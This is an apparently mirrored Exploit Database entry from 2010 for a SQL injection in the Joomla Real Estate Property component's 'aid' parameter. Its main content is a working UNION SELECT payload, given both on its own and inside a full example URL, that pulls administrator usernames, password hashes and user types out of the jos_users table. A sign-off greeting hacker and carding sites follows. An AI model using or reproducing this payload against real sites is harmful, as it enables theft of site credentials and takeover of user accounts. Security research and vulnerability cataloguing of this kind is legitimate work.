Joomla! Component Real Estate Property 3.1.22-03 – ‘aid’ SQL Injection

• Exploit Database
• 117 阅读

• 作者： c4uR
  日期： 2010-04-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12136/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   Author: c4uR [caurcdma@yahoo.com] Date: April, 10-2010 [INDONESIA] Exploit Title: Joomla Component com_properties[aid] SQL Injection Vulnerability   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   ###################################################################################   +++ Vulnerable File +++ http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=[gubr4k]   +++ ExploiT +++ -91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--   +++ Example +++ http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--       ###################################################################################   ----------------------------------------------------------------------------------   DEVILZC0DE.ORG + INDONESIANHACKER.ORG + HACKER-NEWBIE.ORG + YOGYACARDERLINK.WEB.ID hashkiller.com + insidepro.com + xaknet.ru + turkishajan.com   ----------------------------------------------------------------------------------   [ thnx to ]   [+] Apartement Griya Semanggi + poisonV [+] Indonesia gg ada matinye, walaupun terkadang suram